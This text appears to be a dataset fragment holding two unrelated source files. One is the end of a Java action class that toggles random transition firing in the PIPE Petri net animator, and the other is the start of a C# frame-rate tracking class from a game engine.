@param applicationController main PIPE application controller\n */\n public MultiRandomAnimateAction(String name, String tooltip, String keystroke, GuiAction stepBackwardAction,\n PipeApplicationController applicationController) {\n super(name, tooltip, keystroke);\n this.stepBackwardAction = stepBackwardAction;\n this.applicationController = applicationController;\n }\n\n\n /**\n * Fires the specified number of enabled transitions\n * @param event event \n */\n @Override\n public void actionPerformed(ActionEvent event) {\n PetriNetController petriNetController = applicationController.getActivePetriNetController();\n GUIAnimator animator = petriNetController.getAnimator();\n if (animator.getNumberSequences() > 0) {\n // stop animation\n animator.setNumberSequences(0);\n setSelected(false);\n } else {\n stepBackwardAction.setEnabled(true);\n setSelected(true);\n animator.startRandomFiring();\n }\n }\n}" +"\ufeffusing Sandbox.Game.Debugging;\nusing Sandbox.Game.World;\n\nnamespace Sandbox.Engine.Utils\n{\n public static class MyFpsManager\n {\n static long m_lastTime = 0;\n static uint m_fpsCounter = 0;\n static uint m_sessionTotalFrames = 0;\n static uint m_maxSessionFPS = 0;\n static uint m_minSessionFPS = int.MaxValue;\n\n static uint m_lastFpsDrawn = 0;\n\n static long m_lastFrameTime = 0;\n static long m_lastFrameMin = long.MaxValue;\n static long m_lastFrameMax = long.MinValue;\n static byte m_firstFrames = 0;\n\n // Returns FPS once per second. We can't display actual FPS at every frame, because it will be changing quickly and so unreadable.\n public static int GetFps()\n {\n return (int)m_lastFpsDrawn;\n }\n\n public static int GetSessionTotalFrames()\n {\n return (int)m_sessionTotalFrames;\n }\n\n public static int GetMaxSessionFPS()\n {\n return (int)m_maxSessionFPS;\n }\n\n public static int GetMinSessionFPS()\n {\n return (int)m_minSessionFPS;\n }\n\n /// <summary>\n /// Returns update + render time of last frame in ms\n /// </summary>\n /// <returns></returns>\n public static float FrameTime { get; private set; }\n\n /// <summary>\n /// Returns update + render time of last frame (Average in last second)\n /// </summary>\n /// <returns></returns>\n public static float FrameTimeAvg { get; private set; }\n public static float FrameTimeMin { get; private set; }\n public static float FrameTimeMax { get; private set; }\n\n public static void Update()\n {\n m_fpsCounter++;\n m_sessionTotalFrames++;\n\n if (MySession.Static == null)"